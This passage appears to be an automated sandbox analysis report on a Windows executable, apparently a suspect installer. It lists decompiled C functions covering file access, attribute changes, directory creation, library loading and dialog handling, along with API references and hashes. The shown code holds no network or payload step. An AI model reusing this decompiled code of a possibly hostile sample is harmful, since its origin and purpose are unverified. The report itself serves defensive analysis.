                0x00406933
                0x00406936
                0x00406939
                0x00406939
                0x00406939
                0x00406939
                0x0040693c
                0x0040693c
                0x00406940
                0x004069a0
                0x004069a3
                0x004069a8
                0x004069a9
                0x004069ab
                0x004069ad
                0x004069b0
                0x004068bc
                0x004068bc
                0x00000000
                0x004068c2
                0x004068bc
                0x00406942
                0x00406948
                0x0040694b
                0x0040694e
                0x00406951
                0x00406954
                0x00406957
                0x0040695a
                0x0040695d
                0x00406960
                0x00406963
                0x0040697c
                0x0040697f
                0x00406982
                0x00406985
                0x00406989
                0x0040698b
                0x0040698b
                0x0040698c
                0x0040698f
                0x00406965
                0x00406965
                0x0040696d
                0x00406972
                0x00406974
                0x00406977
                0x00406977
                0x00406992
                0x00406999
                0x00000000
                0x0040699b
                0x00000000
                0x0040699b
                0x00000000
                0x00406637
                0x0040663a
                0x00406670
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a3
                0x004067a3
                0x004067a6
                0x004067a8
                0x00406a32
                0x00000000
                0x00406a32
                0x004067ae
                0x004067b1
                0x00000000
                0x00000000
                0x004067b7
                0x004067bb
                0x004067be
                0x004067be
                0x004067be
                0x00000000
                0x004067be
                0x0040663c
                0x0040663e
                0x00406640
                0x00406642
                0x00406645
                0x00406646
                0x00406648
                0x0040664a
                0x0040664d
                0x00406650
                0x00406666
                0x0040666b
                0x004066a3
                0x004066a3
                0x004066a7
                0x004066d3
                0x004066d5
                0x004066dc
                0x004066df
                0x004066e2
                0x004066e2
                0x004066e7
                0x004066e7
                0x004066e9
                0x004066ec
                0x004066f3
                0x004066f6
                0x00406723
                0x00406723
                0x00406726
                0x00406729
                0x0040679d
                0x0040679d
                0x0040679d
                0x00000000
                0x0040679d
                0x0040672b
                0x00406731
                0x00406734
                0x00406737
                0x0040673a
                0x0040673d
                0x00406740
                0x00406743
                0x00406746
                0x00406749
                0x0040674c
                0x00406765
                0x00406767
                0x0040676a
                0x0040676b
                0x0040676e
                0x00406770
                0x00406773
                0x00406775
                0x00406777
                0x0040677a
                0x0040677c
                0x0040677f
                0x00406783
                0x00406785
                0x00406785
                0x00406786
                0x00406789
                0x0040678c
                0x0040674e
                0x0040674e
                0x00406756
                0x0040675b
                0x0040675d
                0x00406760
                0x00406760
                0x0040678f
                0x00406796
                0x00406720
                0x00406720
                0x00406720
                0x00406720
                0x00000000
                0x00406798
                0x00000000
                0x00406798
                0x00406796
                0x004066a9
                0x004066ac
                0x004066ae
                0x004066b1
                0x004066b4
                0x004066b7
                0x004066b9
                0x004066bc
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c2
                0x004066c5
                0x004066cc
                0x004066a0
                0x004066a0
                0x004066a0
                0x004066a0
                0x00000000
                0x004066ce
                0x00000000
                0x004066ce
                0x004066cc
                0x00406652
                0x00406655
                0x00406657
                0x0040665a
                0x00000000
                0x00000000
                0x004063b9
                0x004063b9
                0x004063bd
                0x00406a02
                0x00000000
                0x00406a02
                0x004063c3
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d2
                0x004063d5
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e2
                0x004063e2
                0x004063e2
                0x00000000
                0x00000000
                0x00406544
                0x00406544
                0x00406548
                0x00406a0e
                0x00000000
                0x00406a0e
                0x0040654e
                0x00406551
                0x00406554
                0x00406557
                0x00406559
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657a
                0x0040657d
                0x0040657f
                0x0040657f
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00406582
                0x00406582
                0x00000000
                0x00406582
                0x00406803
                0x00406a38
                0x00000000
                0x00000000
                0x00406067
                0x00406a6f
                0x00406a6f
                0x00000000
                0x00406a6f
                0x004068bc
                0x00406843
                0x00406840

                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                Download Yara Rule
                C-Code - Quality: 69%
                			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423f70; // 0x58e5bc
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42372c =  *0x42372c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42372c, 0x7530,  *0x423714), 0);
					}
				}
				return 0;
			}












                0x0040138a
                0x004013fa
                0x00401392
                0x0040139b
                0x004013a0
                0x00000000
                0x00000000
                0x004013a2
                0x004013a3
                0x004013ad
                0x00000000
                0x00401404
                0x004013b0
                0x004013b7
                0x004013bd
                0x004013be
                0x004013c0
                0x004013c2
                0x004013b9
                0x004013b9
                0x004013ba
                0x004013ba
                0x004013c9
                0x004013cb
                0x004013f4
                0x004013f4
                0x004013c9
                0x00000000

                APIs
                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                • SendMessageA.USER32 ref: 004013F4
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405F28, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405F28(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EBA(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                0x00405f30
                0x00405f33
                0x00405f3a
                0x00405f42
                0x00405f4e
                0x00000000
                0x00405f55
                0x00405f45
                0x00405f4c
                0x00000000
                0x00405f5d
                0x00000000

                APIs
                • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                • GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                  • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                  • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                  • Part of subcall function 00405EBA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                • String ID:
                • API String ID: 2547128583-0
                • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040586F, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E0040586F(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                0x00405873
                0x00405880
                0x00405895
                0x0040589b

                APIs
                • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\RHK098760045678009000.exe,80000000,00000003), ref: 00405873
                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405850, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405850(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}





                0x00405854
                0x0040585d
                0x00405866
                0x00000000
                0x00405866
                0x0040586c

                APIs
                • GetFileAttributesA.KERNELBASE(?,0040565B,?,?,?), ref: 00405854
                • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405866
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004053C3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004053C3(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                0x004053c9
                0x004053d1
                0x00000000
                0x004053d7
                0x00000000

                APIs
                • CreateDirectoryA.KERNELBASE(?,00000000,004030EE,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 004053C9
                • GetLastError.KERNEL32 ref: 004053D7
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CreateDirectoryErrorLast
                • String ID:
                • API String ID: 1375471231-0
                • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403081, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403081(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                0x00403085
                0x00403098
                0x004030a0
                0x00000000
                0x004030a7
                0x00000000
                0x004030a9

                APIs
                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDA,000000FF,00000004,00000000,00000000,00000000), ref: 00403098
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004030B3, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004030B3(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                0x004030c1
                0x004030c7

                APIs
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,0002B3E4), ref: 004030C1
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 004047D3, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 478windowmemoryCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 98%
                			E004047D3(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423f68; // 0x58d974
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423f50; // 0x58d7c8
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423f59 & 0x00000002;
							if(( *0x423f59 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404753(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423f58; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420514;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42052c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420514 = _t315;
									 *0x42052c = _t315;
									 *0x423fa0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423f59 & 0x00000001;
										if(( *0x423f59 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423f6c - _t315; // 0x3
										_v32 =  *0x42052c;
										_t196 =  *0x423f68; // 0x58d974
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42371c; // 0x59455b
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040470E(0x3ff, 0xfffffffb, E00404726(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x58d97c
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x58d98c
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423f6c; // 0x3
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42052c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
